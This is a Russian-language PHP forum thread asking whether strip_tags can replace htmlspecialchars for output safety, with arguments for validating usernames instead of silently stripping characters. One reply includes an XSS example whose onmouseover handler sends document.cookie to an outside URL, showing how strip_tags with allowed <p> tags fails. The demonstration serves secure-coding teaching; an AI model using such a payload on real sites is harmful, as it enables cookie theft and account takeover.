Почему? Если не брать во внимание удаление html и php тегов

_____________
Принимаю заказы, писать в ЛС

Это то понятно, на выходе, что лучше использовать?

_____________
Принимаю заказы, писать в ЛС

А зачем мне имя пользователя - <"? так@ е,

Поэтому и хочу вырезать - strip_tags может заменить htmlspecialchars с точки зрения безопасности? В таблицу записывается как есть)

_____________
Принимаю заказы, писать в ЛС

А при чем тут ты? Пользователь хочет такое, значит будет такое.
Если ты не хочешь такое, значит еще ДО записи в базу, ты должен проверить, соответсвует ли имя пользователя твоим желаниям.
Если не соответсвует, то отклонить его и уведомить об этом пользователя, указав допустимые символы.

Инач что будет?
Я регистрируюсь у тебя как Alles<Klar>, ты в тихую вырезаешь символы и пишешь мой логин в базу, как AllesKlar.
Но я-то потом буду логиниться так, как я писал. Я же не знаю, что ты порезал. И, естественно, я нифига не залогинюсь, потому что в твоей базе просто нет пользователя Alles<Klar>

Ну, ты можешь, конечно, запомнить, что надо резать везде, и при логине тоже. Тогда совпадет.
Но вот я в своем профиле буду видеть не то, как я зарегистрировался, а то, как ты меня зарегистрировал.

Дальше, ввод описания товара, ввод коментариев, отправка сообщений.
А что, в сообщениях тоже нельзя будет отправлять никакие символы? А как же я тебе тогда напишу пример кода?
А через полгода ты 100% забудешь где и что нужно вырезать, а где не нужно, а где нужно, но не всё.



_____________
[продано копирайтерам]

$_GET['login']="
<p onmouseover=\"window.location.href='http://phpforum.su/index.php?showuser=37963&cookie='+document.co   okie;\">
Наведи на меня мышку и отправь мне все свои куки, чтоб я потом вошел под тобой
</p>";
echo strip_tags($_GET['login'],'<p>');

Хитрый какой

А если htmlspecialchars норм.будет?

_____________
Принимаю заказы, писать в ЛС

htmlspecialchars - АБСОЛЮТНО безопасен в этом случае.

_____________
Не тот велик, кто не падал, а тот кто падал и поднимался.